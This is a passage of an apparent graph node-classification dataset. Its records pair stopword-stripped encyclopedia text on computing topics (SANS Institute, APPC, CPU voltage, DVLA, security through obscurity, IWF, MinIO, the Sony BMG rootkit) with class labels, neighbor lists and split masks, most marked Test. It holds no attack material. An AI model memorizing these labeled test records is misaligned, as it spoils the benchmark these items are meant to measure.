    "text": "SANS_Institute:sans institute sans institute officially escal institute advanced technologies private u.s. for-profit company founded 1989 specializes information security cybersecurity training selling certificates topics available training include cyber network defenses penetration testing incident response digital forensics audit information security courses developed consensus process involving administrators security managers information security professionals courses cover security fundamentals technical aspects information security institute recognized training programs certification programs sans stands sysadmin audit network security sans institute sponsors internet storm center internet monitoring system staffed global community security practitioners sans reading room research archive information security policy research documents sans one founding organizations center internet security sans offers news analysis twitter feeds e-mail newsletters additionally weekly news vulnerability digest available subscribers originally organized 1989 sans training events functioned like traditional technical conferences showcasing technical presentations mid-1990s sans offered events combined training tradeshows beginning 2006 sans offered asynchronous online training sans ondemand virtual synchronous classroom format sans vlive free webcasts email newsletters risk newsbites ouch developed conjunction security vendors actual content behind sans training courses training events remain vendor-agnostic vendors pay offer official sans course although teach sans hosted event via sponsorship 1999 sans institute formed global information assurance certification giac independent entity grants certifications information security topics developed operates netwars suite interactive learning tools simulating scenarios cyberattacks netwars use us air force us army majority sans faculty sans employees industry professionals respected experts field information security faculty organized six different levels mentors community certified instructors principal instructors senior instructors fellows sans established sans technology institute accredited college based sans training giac certifications november 21 2013 sans technology institute granted regional accreditation middle states commission higher education sans technology institute focuses exclusively cybersecurity offering master science degree program information security engineering msise five post-baccalaureate certificate programs penetration testing ethical hacking incident response industrial control systems cyber defense operations cybersecurity engineering core upper-division undergraduate certificate program applied cybersecurity sans continues offer free security content via sans technology institute leadership lab it/security related leadership information",
    "neighbors": [
      6273,
      10633,
      399,
      5010,
      4883,
      5780,
      7059,
      6550,
      3994,
      2717,
      2976,
      297,
      10539,
      7605,
      183,
      7228,
      3133,
      9791,
      4552,
      331,
      11476,
      9049,
      3552,
      612,
      11112,
      1907,
      4467,
      6773,
      7031,
      10492,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 10438,
    "label": 5,
    "text": "IBM_Advanced_Program-to-Program_Communication:ibm advanced program-to-program communication computing advanced program program communication appc protocol computer programs use communicate network appc application layer osi model enables communications programs different computers portables workstations midrange host computers appc defined vtam lu 6.2 logical unit type 6.2 appc developed 1982 component ibm systems network architecture sna several apis developed programming languages cobol pl/i c rexx appc software available many different ibm non-ibm operating systems either part operating system separate software package appc serves translator application programs network application computer passes information appc software appc translates information passes network interface lan adapter card information travels across network another computer appc software receives information network interface appc translates information back original format passes corresponding partner application appc mainly used ibm installations running operating systems z/os formerly mvs os/390 z/vm formerly vm/cms z/tpf ibm formerly os/400 os/2 aix z/vse formerly dos/vse microsoft also includes sna support microsoft host integration server major ibm software products also include support appc including cics db2 cim websphere mq unlike tcp/ip communication partners always possess clear role one always server others always client appc peer-to-peer protocol communication partners appc equal every application server client equally role number parallel sessions partners negotiated cnos sessions change number session special log mode e.g ibm 'snasvcmg transmission data made 'data sessions log modes determined detail vtam administrator e.g length data blocks coding etc.. also apparent architects appc could used provide operating system services remote computers separate architecture group formed use appc enable programs one computer transparently use data management services remote computers use appc session created used client-server fashion conversational communications manager distributed data management architecture ddm message formats protocols defined accessing managing record-oriented files stream-oriented files relational databases base architecture distributed relational database architecture drda services variety ddm drda products implemented ibm vendors increasing prevalence tcp/ip appc declined although many ibm systems translators enterprise extender rfc 2353 allow sending appc-formatted traffic ip networks appc confused similarly named appn advanced peer-to-peer networking appc manages communication programs operating application presentation layers contrast appn manages communication machines including routing operates transport network layers",
    "neighbors": [
      8640,
      4546,
      10280,
      2222,
      7733,
      8502,
      2775,
      2168,
      3323,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10439,
    "label": 7,
    "text": "Data_diffusion_machine:data diffusion machine data diffusion machine historical virtual shared memory architecture data free migrate machine shared memory machines convenient programming scale beyond tens processors data diffusion machine ddm overcomes problem providing virtual memory abstraction top distributed memory machine ddm appears user conventional shared memory machine implemented using distributed memory architecture data diffusion machines active research late 1980s early 1990s research ceased since",
    "neighbors": [
      1866,
      11539
    ],
    "mask": "Test"
  },
  {
    "node_id": 10440,
    "label": 3,
    "text": "CPU_core_voltage:cpu core voltage cpu core voltage v power supply voltage supplied cpu digital circuit gpu device containing processing core amount power cpu uses thus amount heat dissipates product voltage current draws modern cpus cmos circuits current almost proportional clock speed cpu drawing almost current clock cycles see however subthreshold leakage order help conserve power manage heat many laptop desktop processors power management feature allows software usually operating system adjust clock speed core voltage dynamically often voltage regulator module converts 5v 12 v voltage whatever cpu core voltage required cpu trend towards lower core voltages conserve power presents cmos designer challenge cmos voltages go ground supply voltage source gate drain terminals fets supply voltage zero voltage across mosfet formula formula_1 says current formula_2 supplied fet proportional gate-source voltage reduced threshold voltage formula_3 dependent geometrical shape fet channel gate physical properties especially capacitance order reduce formula_3 necessary order reduce supply voltage increase current one must increase capacitance load driven fact another fet gate current needed drive proportional capacitance thus requires designer keep low trend towards lower supply voltage therefore works goal high clock speed improvements photolithography reduction threshold voltage allow improve another note formula shown long channel mosfets area mosfets halving every 18-24 months moore law distance two terminals mosfet switch called channel length becoming smaller smaller changes nature relationship terminal voltages current processor overclocked clock speed increased cost system stability withstand higher clocks core voltage often needs increased cost power consumption heat dissipation known overvolting overvolting generally involves running processor specifications may damage shorten cpu life dual-voltage cpu uses split-rail design allow lower voltages used processor core external input/output i/o voltages remain 3.3 volts backwards compatibility single-voltage cpu uses single power voltage throughout chip supplying i/o power internal power 2002 microprocessor market statistics cpus single-voltage cpus cpus pentium mmx single-voltage cpus dual-voltage cpus introduced performance gain increasing clock speeds finer semiconductor fabrication processes resulted excess heat generation power supply concerns especially regarding laptop computers using voltage regulator external i/o voltage levels would transformed lower voltages order reduce power usage resulting less heat produced ability operate higher frequencies vrt feature older intel p5 pentium processors typically intended use mobile environment refers splitting core voltage supply i/o voltage vrt processor 3.3 v i/o 2.9 v core voltage save power compared typical pentium processor i/o core voltage 3.3v pentium mmx later processors adopted so-called split rail power supply",
    "neighbors": [
      2273,
      10658,
      5444,
      10440,
      1677,
      4334,
      7983,
      1776,
      5649,
      8851,
      10966,
      1849,
      3194
    ],
    "mask": "Test"
  },
  {
    "node_id": 10441,
    "label": 1,
    "text": "Driver_and_Vehicle_Licensing_Agency:driver vehicle licensing agency driver vehicle licensing agency dvla organisation uk government responsible maintaining database drivers great britain database vehicles entire united kingdom counterpart drivers northern ireland driver vehicle agency dva agency issues driving licences organises collection vehicle excise duty also known road tax road fund licence sells personalised registrations dvla executive agency department transport dft current chief executive agency julie lennard dvla based swansea wales prominent 16-storey building clase offices swansea vale previously known driver vehicle licensing centre dvlc agency previously network 39 offices around great britain known local office network users could attend apply licences transact business throughout course 2013 local offices gradually closed closed december 2013 agency work consequently fully centralised swansea majority users transact remotely post transactions phone dvla introduced electronic vehicle licensing evl 2004 allowing customers pay vehicle excise duty online telephone however customers still option tax vehicles via post office seven-year contract enabling post office continue process car tax applications agreed november 2012 option three-year extension originally vehicle registration responsibility borough county councils throughout great britain system created motor car act 1903 licensing system centralised 1965 administered driver vehicle licensing centre dvlc swansea 1990 dvlc renamed driver vehicle licensing agency dvla becoming executive agency department transport civilian vehicles used germany members british forces germany families registered dvla behalf ministry defence official diplomatic consular vehicles registered dvla behalf foreign commonwealth office vehicle register held dvla used many ways example dvla identify untaxed vehicles outside agencies identify keepers cars entering central london paid congestion charge exceed speed limits road speed cameras matching cars keepers utilising dvla database current dvla vehicle register built eds £5 million contract signed 1996 planned implementation date october 1998 though actual implementation delayed year uses client–server architecture uses vehicle identification number rather registration plate primary key track vehicles eliminating possibility multiple registrations single vehicle vehicle identity check vic introduced help reduce vehicle crime intended deter criminals disguising stolen cars identity written scrapped vehicles however scheme later scrapped october 2014 insurance company writes car registration document v5 logbook surrendered destroyed insurance company notify dvla vehicle written notification set vic marker vehicle record dvla database dvla database records used commercial vehicle check companies offer comprehensive individual car check prospective purchasers however accuracy data held remains continuing problem anyone request information database purport cause need fee £2.50 database drivers developed late 1980s holds details 42 million driving licence holders uk used produce driving licences assist bodies driving standards agency police courts enforcement legislation concerning driving entitlements road safety dvla revealed december 2012 temporarily banned 294 public bodies including local councils police forces using access database correctly 2006 2012 38 bodies banned permanently period 2002 2015 estimated dvla spent £500 million information technology ibm staff dvla predominantly female whereas parts department transport predominantly male starting salaries £12,500 november 2007 public accounts committee report criticised amazingly high levels sick leave among staff dvla employees took average three weeks per year sick leave report said overall sickness leave dft seven agencies averaged 10.4 working days per full-time employee 2005 calculated costing taxpayers £24 million sick leave rates department four agencies average—at dvla dsa together employ 50 dft staff—they significantly higher committee chairman edward leigh said surprising agencies could function adequately 2008 dvla staff went one-day strike pay inequality arguing receive similar salaries employees department transport recent level sickness absence 2012/13 6.7 days 2006 120,000 130,000 vehicle registration certificates went missing bbc investigation 2010 found vehicles worth £13 million stolen using documents 18 months preceding investigation around ten cars found week forged log books police said would decades recovered 7 february 2007 letter bomb sent dvla swansea injured four people suspected part group letter bombs sent organisations deal administration motoring charges offences capita central london targeted days earlier miles cooper aged 27 school caretaker arrested 19 february 2007 charged 22 february dvla since installed x-ray machines post opening areas reduce effectiveness attacks december 2007 revealed sending surveys 1,215 drivers dvla sent confidential details wrong owners error occurred sending routine surveys discovered members public contacted dvla notify error 2009 bbc watchdog reported entitlements specifically entitlement drive motorcycle lost reissued driving licences 2005 programme highlighted drivers lost entitlements drive heavy goods vehicles similar way 2010 revealed dvla sold drivers details database certain private parking enforcement companies run individuals criminal records dvla sells details companies £2.50 found agency sold business fined weeks unfair business practices dvla uses advertising warn drivers pay road tax cars may crushed despite bill rights 1689 section 12 states 'all fines forfeitures conviction illegal void uk legal persons equality law dvla therefore stands equal private citizens court law seeking civil penalty sorn 'fine so-called dvla right sue car owners civil court practice dvla illegally usurps judicial procedure bypasses presumption innocence levies fine £40 £80 without regard extenuating circumstances illness documents lost post etc sorn scheme never debated parliament also 'daft pointless legislation motorists ... asked confirm dvla already know acknowledgment lost post might need proof 've confirmed 've confirmed already know ... dvla makes mistake claims car owners responsible clamping vehicles explicitly outlawed scotland may english law constitute common law offence 'holding property ransom according peter oborne fines levied dvla grossly disproportionate represent justice part unofficial supplementary tax-gathering system dvla handled 12,775 complaints year 2015/16 failed resolve 14.9 first contact overall complaints year 6.5 dvla 'customer service excellence standard retained details provided measured customer satisfaction levels varied 76 97 four categories surveyed vehicle registration driver licence renewal vehicle taxation driver medical transactions data provided respect complaints sorn scheme fines levied dvlc swansea regularly referred british political sitcom yes minister bernard woolley regularly threatened reassignment episode big brother jim hacker scheduled give address",
    "neighbors": [
      10441,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 10442,
    "label": 4,
    "text": "Security_through_obscurity:security obscurity security obscurity security obscurity reliance security engineering design implementation secrecy main method providing security system component security experts rejected view far back 1851 advise obscurity never security mechanism early opponent security obscurity locksmith alfred charles hobbs 1851 demonstrated public state-of-the-art locks could picked response concerns exposing security flaws design locks could make vulnerable criminals said rogues keen profession know already much teach scant formal literature issue security obscurity books security engineering cite kerckhoffs doctrine 1883 cite anything example discussion secrecy openness nuclear command control benefits reducing likelihood accidental war considered outweigh possible benefits secrecy modern reincarnation kerckhoffs doctrine first put forward nineteenth century security system depend key design remaining obscure field legal academia peter swire written trade-off notion security obscurity illusion military notion loose lips sink ships well competition affects incentives disclose principle security obscurity generally accepted cryptographic work days essentially well-informed cryptographers employed national intelligence agencies national security agency cryptographers often work universities researchers publish many even results publicly test others designs private industry results often controlled patents copyrights secrecy argument lost former popularity example pgp whose source code publicly available anyone generally regarded military-grade cryptosystem conflicting stories origin term fans mit incompatible timesharing system say coined opposition multics users hall security far issue within culture term referred self-mockingly poor coverage documentation obscurity many commands attitude time tourist figured make trouble 'd generally got urge make felt part community one instance deliberate security obscurity noted command allow patching running system altmode altmode control-r echoed ^d typing alt alt control-d set flag would prevent patching system even user later got right security obscurity alone discouraged recommended standards bodies national institute standards technology nist united states sometimes recommends practice system security depend secrecy implementation components technique stands contrast security design open security although many real-world projects include elements strategies knowledge system built differs concealment camouflage efficacy obscurity operations security depends whether obscurity lives top good security practices used alone used independent layer obscurity considered valid security tool recent years security obscurity gained support methodology cybersecurity moving target defense cyber deception nist cyber resiliency framework 800-160 volume 2 recommends usage security obscurity complementary part resilient secure computing environment research firm forrester recommends usage environment concealment protect messages advanced persistent threats",
    "neighbors": [
      5387,
      8715,
      9356,
      1683,
      2324,
      4117,
      2975,
      1315,
      8764,
      1344,
      4552,
      1101,
      7887,
      8273,
      8283,
      6877,
      10466,
      3944,
      8171,
      2801,
      6772,
      3701,
      6902,
      8692,
      1147,
      5887
    ],
    "mask": "Test"
  },
  {
    "node_id": 10443,
    "label": 2,
    "text": "RTXC_Quadros:rtxc quadros rtxc quadros real time operating system rtos written mainly c programming language mainly intended use embedded systems rtxc rtos originally developed barrett associates 1970s currently maintained quadros systems inc. houston texas rtxc quadros comes tracing tool give insight runtime dynamics timing rtxcview",
    "neighbors": [
      2179,
      9964,
      9366,
      1462,
      2045,
      6207
    ],
    "mask": "Test"
  },
  {
    "node_id": 10444,
    "label": 5,
    "text": "Text_over_IP:text ip text ip toip means providing real-time text rtt service operates ip-based networks complements voice ip voip video ip real-time text streaming text transmitted produced allowing text used conversationally real-time text defined itu-t multimedia recommendation f.700 2.1.2.1 real-time text designed conversational use people interactively converse achieve particular user requirements specified delay character character loss rate see f.700 annex a.3 real-time text ip used toip designed around itu-t t.140 real-time text presentation layer protocol defined h.32x multimedia services t.140 allows real-time editing text e.g using 'backspace retyping t.140 based iso 10646-1 character set used ip text specifications uses utf-8 format transport toip uses real-time transport protocol rtp voip video-over-ip text encoded according ietf rfc 4103 rtp payload text conversation rfc 4103 supports optional forward error correction scheme based redundant transmission using rfc 2198 results low end-to-end packet loss across ip transmission links moderately high packet loss improve efficiency text buffered 0.3 – 0.5 seconds sent whilst still meeting delay requirements rtp usually transported user datagram protocol udp however 2.5g mobile networks supported transmission control protocol tcp consistently support udp implementations toip mobile networks use tcp internally 3g mobile networks support udp protocol stack toip medium fast typing 30 characters per second results two kilobit per second traffic load including overheads rfc4103 maximum level redundancy rtp udp ip control toip sessions defined using standard session initiation protocol sip rfc 3261 session description protocol sdp rfc 4566 protocols see ietf rfc 5194 framework real-time text ip using session initiation protocol sip ietf rfc 4504 sip telephony device requirements configuration section 2.9 information next generation networking ngns concept developed telecommunication service providers suppliers aims create true multi-service network based ip technology toip specified inclusion 3gpp ip multimedia subsystem ims 3gpp ts 26.114 v2.0.0 ims multimedia telephony media handling interaction ims used implement ngns many fixed mobile networks support toip considered multimedia emergency public-safety answering point psaps europe usa ecrit ietf working group defines toip one form access emergency services toip provide 'low impact solution meeting national regulatory requirements provide 'equivalent service telephone service people hearing speech impairments typical terminal fixed line access home computer supports multimedia communications voice video real-time text ip see external links information toip equipment software telecommunications device deaf tdd ttys also called textphone minicoms designed transport real-time text pstn tdds use range modem technologies text-over-ip designed replacement tdds using ip-based networks also use mainstream voice call users less service restrictions compared tdds designed used mainstream service used standard computers mobile terminals proper alerting systems incoming calls need included well user interfaces hardware software meet needs deaf people people hearing speech impairments best achieved input end-users development stages interworking tdds toip implemented using gateways t-meeting omnitor trace r rnid center voiceriver annies rfc 5194 framework real-time text ip using session initiation protocol sip provides overview interworking issues work proposed ietf sipping work group detailed interworking based range call scenarios",
    "neighbors": [
      9381,
      9131,
      10924,
      7407,
      11413,
      10271
    ],
    "mask": "Test"
  },
  {
    "node_id": 10445,
    "label": 2,
    "text": "Find_My_Device:find device find device application service provided google remotely trace locate android devices phones tablets watches using map find device uses map locate trace exert location android device located location available allow users remotely locate android device linked google account",
    "neighbors": [
      4995,
      5892,
      7816,
      5262,
      8719,
      5524,
      7700,
      10645,
      8858,
      1435,
      10525,
      2978,
      4901,
      1959,
      3499,
      10284,
      7983,
      1203,
      5431,
      7359,
      196,
      3269,
      3782,
      11590,
      4683,
      11343,
      3664,
      3795,
      1240,
      8413,
      6367,
      2658,
      6632,
      5483,
      236,
      9712,
      9970,
      8821,
      3836
    ],
    "mask": "Test"
  },
  {
    "node_id": 10446,
    "label": 4,
    "text": "Internet_Watch_Foundation:internet watch foundation internet watch foundation iwf registered charity based cambridgeshire england states remit minimise availability online sexual abuse content specifically child sexual abuse images videos hosted anywhere world non-photographic child sexual abuse images hosted uk content inciting racial hatred removed iwf remit police website set purpose april 2011 iwf used also take reports criminally obscene adult content hosted uk removed iwf ’ remit 2017 part function iwf says supply partners accurate current url list enable blocking child sexual abuse content excellent responsive national hotline reporting service receiving reports public addition receiving referrals public agents also proactively search open web deep web identify child sexual abuse images videos ask service providers take websites containing images block fall outside uk jurisdiction found open web traces content hosted geographically either directly issues notice hosting company remove imagery hosted uk works network hotlines police around world follow country ’ process removing imagery 99 child sexual abuse images found iwf hosted outside uk instance whilst work remove imagery takes place iwf places web address url list partners block content 2010 office government commerce ogc required procurement specifications provision internet-related services government agencies public bodies require internet service provider isp block access sites iwf list iwf operates informal partnerships police government public internet companies across world originally formed police suspected child pornography online iwf remit later expanded cover criminally obscene material iwf takes strong stance term ‘ child pornography ’ website cites “ use term child sexual abuse reflect gravity images videos deal child pornography child porn kiddie porn acceptable descriptions child consent abuse ” iwf incorporated charity limited guarantee largely funded voluntary contributions uk communications service providers including isps mobile phone operators internet trade associations search engines hardware manufacturers software providers also currently receives funding european union comprising one third uk safer internet centre iwf governed board trustees consists independent chair six non-industry representatives three industry representatives plus one co-opted independent representative specialism human rights board monitors reviews iwf remit strategy policy budget enable iwf achieve objectives iwf operate offices vision park near cambridge criticized ineffective quango deserve charity status producing excessive numbers false positives secrecy proceedings poor technical implementations policies degraded response time whole uk internet iwf succeeded reducing child sexual abuse imagery hosted uk 18 1996 0.04 2018 1996 metropolitan police told internet service providers association ispa content carried newsgroups made available illegal considered isps involved publishers material therefore breaking law august 1996 chief inspector stephen french metropolitan police clubs vice unit sent open letter ispa requesting ban access list 132 newsgroups many deemed contain pornographic images explicit text list arranged first section consisted unambiguously titled paedophile newsgroups continued kinds groups police wanted restrict access including alt.binaries.pictures.erotica.cheerleaders alt.binaries.pictures.erotic.centerfolds although action taken place without prior debate parliament elsewhere police appeared best create simply enforce law acting entirely initiative alan travis home affairs editor newspaper guardian explained book bound gagged ian taylor conservative science industry minister time underlined explicit threat isps stop carrying newsgroups question police would act company provided users pornographic violent material taylor went make clear would calls legislation regulate aspects internet unless service providers seen wholeheartedly embrace responsible self-regulation isp demon internet regarded police request unacceptable censorship however attitude annoyed ispa chairman shez hamill said following tabloid-style exposé demon internet appeared observer newspaper alleged clive feather director demon provides paedophiles access thousands photographs children sexually abused summer autumn 1996 uk police made known planning raid isp aim launching test case regarding publication obscene material internet direct result campaign threats pressure establishment internet watch foundation initially known safety net foundation september 1996 facilitated department trade industry dti discussions held certain isps metropolitan police home office body called safety net foundation formed dawe charitable trust resulted r3 safety net agreement r3 referred triple approach rating reporting responsibility september 1996 agreement made ispa linx safety net foundation subsequently renamed internet watch foundation agreement set requirements associated isps regarding identifiability traceability internet users isps cooperate iwf identify providers illegal content facilitate easier traceability demon internet driving force behind iwf creation one employees clive feather became iwf first chair funding board solicitor mark stephens first chair iwf policy board policy board developed codes guidance operational oversight hotline reporting content funding board made industry representatives chair policy board provided wherewithal iwf day day activities set required policy board 3 years operation iwf reviewed dti home office consultants kpmg denton hall report delivered october 1999 resulted number changes made role structure organisation relaunched early 2000 endorsed government dti played facilitating role creation according dti spokesman time patricia hewitt minister e-commerce said internet watch foundation plays vital role combating criminal material net counter accusations iwf biased favour isps new independent chairman appointed roger darlington former head research communication workers union iwf website offers web-based government-endorsed method reporting suspect online content remains operation united kingdom acts relevant authority accordance memorandum understanding mou concerning section 46 sexual offences act 2003 meaning analysts prosecuted looking illegal content course duties reports submitted anonymously according iwf mou potentially illegal content hosted uk iwf work relevant service provider british police agency content ‘ taken ’ assist necessary offender responsible distributing offending content detected potentially illegal content includes however almost whole iwf site concerned suspected images child sexual abuse little mention criminally obscene material also within remit images judged iwf using uk law images child sexual abuse blocked government claimed would also handling images adult extreme pornography became illegal people uk possess 26 january 2009 longer part iwf ’ remit since 2017 iwf includes extreme pornography example criminally obscene content meaning report material hosted uk uploaded someone uk regarding blocking sites categories remit go far refer sites hosted uk appropriate authorities iwf states works partnership uk government departments home office dcms influence initiatives programmes developed combat online abuse funded european union online industry includes internet service providers mobile operators manufacturers content service providers telecommunications filtering companies search providers financial sector well blue-chip organisations support iwf corporate social responsibility reasons hotline reporting system organisation helps isps combat abuse services notice take service alerting potentially illegal content within remit systems simultaneously invites police investigate publisher iwf connections virtual global taskforce serious organised crime agency child exploitation online protection centre susie hargreaves appointed ceo september 2011 andrew puddephatt appointed chair january 2018 senior leadership team iwf comprises iwf passes notifications suspected child sexual abuse images videos inhope network hotlines across world whenever content traced inhope country inhope hotline iwf works relevant police body country previously iwf passed notifications suspected child pornography hosted non-uk servers uk national criminal intelligence service turn forwards interpol relevant foreign police authority works serious organised crime agency instead iwf however pass notifications types potentially illegal content hosted outside uk iwf compiles maintains list urls individual webpages child sexual abuse content called iwf url list previously referred child abuse image content list caic list whole website included list whole domain dedicated distribution child sexual abuse images says every url list depicts indecent images children advertisements links content publicly available website list typically contains 500 800 urls one time updated twice day ensure entries still live since iwf began proactively searching child sexual abuse imagery since introduction crawler technology list typically contains 5,000 12,000 urls every day daily ‘ churn ’ content added list removed list appropriate offending uk urls listed taken quickly urls elsewhere listed removed list applied isps 95 commercial internet customers uk according iwf website blocking applies potentially criminal urls related child sexual abuse content publicly available websites distribution images channels peer-to-peer matter police partners iwf plans extend type content included list staff 13 trained analysts responsible work iwf ’ 2018 annual report says average 376 new urls added list daily 2004 2006 bt group introduced cleanfeed technology used 80 internet service providers bt spokesman jon carter described cleanfeed function block access illegal web sites listed internet watch foundation described essentially server hosting filter checked requested urls web sites iwf list returning error message web site found positive matches 2006 home office minister alan campbell pledged isps would block access child abuse websites end 2007 middle 2006 government reported 90 domestic broadband connections either currently blocking plans end year target 100 coverage set end 2007 however middle 2008 stood 95 february 2009 government said looking ways cover final 5 interview march 2009 home office spokesperson mistakenly thought iwf deleted illegal content n't look content rate although iwf blacklist causes content censored even content found illegal court law iwf director communications sarah robertson claimed 8 december 2008 iwf opposed censorship legal content case iwf blacklisting cover art hosted wikipedia days prior claimed “ iwf found image illegal ” despite body legal jurisdiction march 2009 home office spokesperson said isps pressured sign iwf blacklist order block child pornography websites said alternative using iwf blacklist zen internet previously refused use iwf blacklist citing concerns effectiveness however quietly joined foundation september 2009 still maintaining concerns 2009 blacklist said contain 450 urls 2009 study researcher richard clayton university cambridge found quarter specific pages otherwise legitimate free file hosting services among rapidshare megaupload sendspace zshare listing pages confidential blacklist pages would cause accesses sites hosting referred iwf potentially causing unintended interference discussed 2018 iwf url list contained 100,682 unique urls r v walker sometimes called girls scream aloud obscenity trial first prosecution written material section 2 1 obscene publications act nearly two decades involved prosecution darryn walker posting story entitled girls scream aloud internet erotic story site 2008 story fictional written account describing kidnap rape murder pop group girls aloud reported iwf passed information scotland yard ’ obscene publications unit trial prosecution claimed story could easily accessed young fans girls aloud however defence demonstrated could located specifically searching material result case abandoned defendant cleared charges 5 december 2008 iwf system started blacklisting wikipedia article covering scorpions 1976 album virgin killer appeared article users major isps including bt vodafone virgin media/tesco.net be/o2 easynet/uk online/sky broadband plusnet demon talktalk opal telecom unable access filtered content although controversial album image still available internet shopping sites physical shops image reported iwf reader iwf determined could seen potentially illegal iwf estimated block affected 95 british residential users iwf since rescinded block issuing following statement additionally many uk internet users unable edit wikipedia pages unless registered logged wikipedia reported due single blacklisted article causing wikipedia traffic isps using system routed transparent proxy server wikipedia distinguishes unlogged-in users ip address interpreted unlogged-in users particular isp single user editing massively proxy address triggered wikipedia anti-abuse mechanism blocking 14 january 2009 uk users reported 85 billion pages internet archive wayback machine blocked although iwf policy block individual offending webpages whole domains according iwf chief executive peter robbins due technical hitch internet archive web site contained urls iwf blacklist requests sent demon internet carried particular header clashed internet archive internal mechanism convert web links serving archived versions web pages actual blocked url caused incident never became publicly known many isps implement iwf filtering using transparent proxy server unconnected iwf quoting plusnet ip address matches server used host one websites iwf list request diverted proxy server hosting server blacklisted problem due requesting page server also hosts listed page iwf lists internet companies voluntarily committed block access child sexual abuse web pages companies may use transparent proxies techniques using transparent proxy unintended side effect quite independent iwf filtering appearing websites connected originating proxy ip instead user real ip sites detect user ip adjust behaviour accordingly example trying download files file distribution website restricts free-of-charge usage enforcing delay typically 30 minutes downloads attempt download interpreted originating isp proxy rather user consequence user isp downloaded file site last half-hour likely large isp download allowed unintended consequence isp use proxy servers iwf filtering file sharing sites distribute files types example linux distribution files large use proxy servers also reported caused problem editing wikipedia blocking actual offending web page reported iwf filtering criticised interfering legitimate internet activity ineffective anyone intending access objectionable content one carefully argued discussion opposing things child pornography terrorism points filtering side effects discussed section would stop access material images child sexual abuse would stop email ftp https p2p usenet irc many ways access content simple encryption systems never stop best drives underground harder assess track february 2009 yorkshire-based software developer lodged formal complaint regarding iwf status charity charity commission pointed regulating worst internet really charitable purpose iwf existed mainly serve interests isps subscribing rather public iwf spokesperson said iwf attained charitable status 2004 order subject robust governance requirements higher levels scrutiny accountability charity law alongside company law brings iwf listed fakecharities.org directory so-called charities receive substantial funding either uk eu governments also termed quango critics implying poor management lack accountability iwf publishes details inspections audits website includes hotline audit every two years independent experts quality assurance inspections inhope hotline umbrella body iso27001 compliance human rights audit organisation carried lord ken macdonald 2014 following iwf blacklisting wikipedia article organisation operating habits came scrutiny j.r. raphael pc world stated incident raised serious free-speech issues alarming one non-governmental organisation ultimately acting morality police 95 uk internet users frank fisher guardian criticized iwf secretiveness lack legal authority among things noted blacklist could contain anything visitor blocked address may know browsing censored government believes self-regulatory system best solution metropolitan police also believe working isps rather trying force via legislation way forward iwf list urls considered host objectionable material distinct actual confidential blacklist pages available isps isps obliged subscribe self-appointed self-regulated internet watchdog views user-submitted content compiles list websites deems contain illegal images questions raised regarding legality viewing content would normally constitute criminal offence iwf memorandum understanding crown prosecution service association chief police officers – npcc “ clarify position professionally involved management operation use electronic communications networks services may face jeopardy criminal offences reassured protection acting combat creation distribution images child abuse ” iwf criticized blacklisting legal content telling websites blocked circumstances owner blocked webpage might even know offending content site means content would still readily available anyone outside uk internet companies deploy services across world implement iwf url list help prevent people stumbling across child sexual abuse imagery blocking methodology implemented company taking list iwf ’ good practice blocking guide recommends companies use splash page people know page blocked view rather simply delivering “ page found ” message lord ken macdonald carried human rights audit addressing iwf ’ members agm 26 november 2013 lord macdonald said “ deeply impressed ” quality staff “ commitment attention freedom expression privacy rights ” historically blacklisting sites may concealed generic http 404 page found message rather explanation content censored exact method censorship determined implementing isp bt example return http 404 pages whereas demon return message stating page censored time wikipedia blocking performance issues accessing site uk reported october 2014 users sky broadband reported slow intermittent performance image host imgur clicking image would typically result site appearing accessing via https causes images load normally bypasses proxy used sites blacklisted content aside iwf url list iwf developed many services may taken internet companies help stop spread child sexual abuse imagery online",
    "neighbors": [
      2945,
      9704,
      8204,
      6000,
      10545,
      4435,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 10447,
    "label": 7,
    "text": "MinIO:minio minio cloud storage server compatible amazon s3 released apache license v2 object store minio store unstructured data photos videos log files backups container images maximum size object 5tb main developer minio cloud storage stack minio inc silicon valley-based technology startup founded anand babu periasamy garima kapoor harshavardhana november 2014 source code hosted github 17,000 stars august 2019 contributions project accepted via github implementation pull requests minio server designed light enough bundled along application stack similar redis default server single instance single backing disk erasure code mode available server configured use four drives erasure code subsystem also attempts automatically detect correct data degradation minio server distributed mode allows operators pool multiple drives local remote single object storage server setup distributed mode resilient node failures provide increased data protection minio server hardware agnostic works variety physical virtual/container environments allows run containers running commodity servers local disks still enterprise-level data safety scalability minio server installed physical virtual machines launched docker containers deployed container orchestration platforms like kubernetes mesosphere docker swarm minio client codice_1 provides alternative standard unix commands e.g codice_2 codice_3 codice_4 codice_5 codice_6 etc adding support amazon s3-compatible cloud storage services aws signature v2 v4 minio client supported linux mac windows platforms minio client sdk provides simple api access amazon s3-compatible object storage server language bindings available go java python javascript haskell languages hosted .net framework",
    "neighbors": [
      11201,
      3876,
      3462,
      8554,
      5677,
      6797,
      7347,
      3573,
      2198,
      823,
      11221,
      1435,
      10111,
      2910,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 10448,
    "label": 4,
    "text": "Sony_BMG_copy_protection_rootkit_scandal:sony bmg copy protection rootkit scandal scandal erupted 2005 regarding sony bmg implementation deceptive illegal harmful copy protection measures 22 million cds inserted computer cds installed one two pieces software provided form digital rights management drm modifying operating system interfere cd copying neither program could easily uninstalled created vulnerabilities exploited unrelated malware sony claims unintentional one programs installed even user refused end-user license agreement eula would still phone home reports user private listening habits mentioned eula contained code several pieces copylefted free software apparent infringement copyright configured operating system hide software existence leading programs classified rootkits sony bmg initially denied rootkits harmful released one programs uninstaller un-hid program installed additional software could easily removed collected email address user introduced security vulnerabilities following public outcry government investigations class-action lawsuits 2005 2006 sony bmg partially addressed scandal consumer settlements recall 10 affected cds suspension cd copy protection efforts early 2007 august 2000 statements sony pictures entertainment us senior vp steve heckler foreshadowed events late 2005 heckler told attendees americas conference information systems industry take whatever steps needs protect protect revenue streams ... lose revenue stream matter ... sony going take aggressive steps stop develop technology transcends individual user firewall napster source – block cable company block phone company block isp firewall pc ... strategies aggressively pursued simply much stake europe bmg created minor scandal 2001 released natalie imbruglia second album white lilies island without warning labels stating cd copy protection cds eventually replaced bmg sony released copy-protected versions certain releases certain markets late 2001 late 2002 report indicated bmg cds sold europe would form copy protection two pieces copy-protection software issue 2005–2007 scandal included 22 million cds marketed sony bmg record company formed 2004 merger sony bmg recorded music divisions two million cds spanning 52 titles contained first 4 internet f4i extended copy protection xcp installed microsoft windows systems user accepted eula made mention software remaining 20 million cds spanning 50 titles contained sunncomm mediamax cd-3 installed either microsoft windows mac os 